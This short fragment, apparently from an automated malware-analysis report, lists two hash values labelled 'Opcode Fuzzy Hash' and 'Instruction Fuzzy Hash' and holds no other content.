                • Opcode Fuzzy Hash: 6e2a16de336dd3fb816dc3201cb09af3330261794a73ae6407fe156a76576772
                • Instruction Fuzzy Hash: 861100D984D7C15FC722D7307D7A245BFA07A53000F1D85CB91858F1F3E2A8960A8383